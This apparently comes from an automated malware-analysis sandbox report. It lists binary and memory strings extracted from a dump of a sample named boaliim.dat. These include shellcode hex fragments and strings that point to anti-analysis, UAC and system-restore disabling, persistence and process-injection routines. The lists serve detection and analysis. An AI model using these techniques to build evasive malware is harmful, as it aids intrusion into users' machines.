Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitmethoden0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitmethodpo
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antianalysis!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _reversep,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disableuac
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitcode
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitask`+
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xcountcharso
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fillattributer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eghgwwhcc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osminorversion1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reserved?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ycountchars
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: showwindow(
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rgsvcs.ex t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirusntext
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _reversebs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execute_vbs_vm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ikvvfncnn.bmp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_path
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: logmaker
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anti_botkillvm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: persistenceq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: emulator_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _stringbetweenb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_contexte
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_startuph
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitasks
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9e5ej
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shimlt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 520c39e26/304/6/3052_4f02_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0\shjgtph.kmt4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: criticalsectiontimeout;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansionbitmap<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpebunlockroutine%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofrvaandsizes.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernelcallbacktableut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansioncounter
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentreservee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentcommittat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: extendedregistersps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: maximumnumberofheaps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofheapreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processstarterhelper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: postprocessinitroutine
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcharacteristics
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: writeprocessmemoryut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofstackcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofheapcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagebaseaddresse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: environmentupdatecount
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: criticalsectiontimeout
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofstackreserver
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdisharedhandletablez
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansionbitmapbitsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdidcattributelistd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inheritedaddressspacem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processparametersnetv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpeblockroutinee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansicodepagedatacount`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unicodecasetabledatai
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: extendedregisters
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansicodepagedataons
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unicodecasetabledataon
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inheritedaddressspace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_contextset41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorlinkerversion5-21-7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorlinkerversionmver8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ef20f3a169*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablesysrestoreatae
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofoptionalheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountinc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720edab4441
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountdec41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: addressofnewexeheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_fixreloc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertorawdatans
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertorelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertolinenumbersta
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofrelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da1ec28a691
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandlesetn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagebaseaddress25541
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofsections
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansioncounter41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberoflinenumbersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_decryptdataeph_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertosymboltable@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpeblockroutinephi
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountssr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: addressofentrypoint{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sectionalignment\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorsubsystemversione
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorsubsystemversionn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofuninitializeddata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: win32versionvalue
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorimageversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorimageversionm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ca0024d60201\comctl32.dllt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: en-us
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c703e6af597b4bin.sdb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d620c1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fe2ff4bb477760319f8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da0ceea6516a6b0c
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptions
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb23f2a4516c7d279f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da03e6af597b4b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f82ff5a1517a7e309f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da1ce2a45f7b4034b1a0w
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qrsbbkj-7wo8i291jb09ygiu694l^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c82fecad5d6b750ce
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase3f2a0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ed0fcb8f6f5556609f{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ntmarta.dllb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_allocateexespace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fexpfc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversion4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold#
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cwvoayzpefzjbexpebfcjexe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemoryheap
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthresholds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethresholda
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdatah
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsnold7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ryoboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dz\temp\
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gvqj.txt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\p
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: checkint
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: denarioy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mainpe~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: chrome
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: thread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ysize`@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: title`?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: flags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eggsh[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dr2ord
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sscs d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segfst=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segds"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seges$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: overlay
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seggs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pagesx]
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pages
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic(_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magich_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eflags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mutant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spareh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segcse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segssj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segfs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: machinei
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic8t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: utant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ordro
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spare2
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: closehandle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: andle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: closehandle0d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segss
